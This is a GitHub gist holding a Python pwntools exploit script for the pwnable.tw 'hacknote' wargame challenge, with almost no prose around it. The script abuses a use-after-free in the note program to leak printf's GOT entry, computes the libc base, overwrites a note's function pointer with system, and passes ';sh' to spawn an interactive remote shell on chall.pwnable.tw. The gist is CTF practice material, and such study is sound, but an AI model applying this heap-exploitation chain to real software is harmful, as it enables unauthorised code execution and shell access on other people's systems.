Skip to content

Instantly share code, notes, and snippets.

@bin2415
Last active June 24, 2018 06:30
Show Gist options
  • Save bin2415/68ef36389ea217e67bf7233331463c7f to your computer and use it in GitHub Desktop.
Save bin2415/68ef36389ea217e67bf7233331463c7f to your computer and use it in GitHub Desktop.
pwnable.tw hacknote
from pwn import *
#p = process('./hacknote', env={"LD_PRELOAD" : "./libc_32.so.6"})
p = remote('chall.pwnable.tw', 10102)
libc = ELF('./libc_32.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
print("/bin/sh address is " + str(hex(address)))
binsh_addr = address
printf_addr = libc.functions['printf'].address
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('16')
p.recvuntil('Content :')
p.sendline('a'*15)
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('16')
p.recvuntil('Content :')
p.sendline('a'*15)
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline('0')
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline('1')
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('8')
p.recvuntil('Content :')
#0x804862b
#got_print 0x804a010
p.sendline(p32(0x804862b)+p32(0x804a010))
p.recvuntil('choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline('0')
got_printf = u32(p.recvline()[0:4])
print("print address is " + str(hex(got_printf)))
libc_base = got_printf - printf_addr
binsh_addr2 = binsh_addr + libc_base
system_addr = libc.functions['system'].address
system_addr2 = system_addr + libc_base
p.recvuntil('choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline('2')
p.recvuntil('choice :')
p.sendline('1')
p.recvuntil('Note size :')
p.sendline('8')
p.recvuntil('Content :')
p.send(p32(system_addr2)+";sh\00")
#p.recvuntil('choice :')
p.sendline('3')
#p.recvuntil('Index :')
p.sendline('0')
#print(p.recv())
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment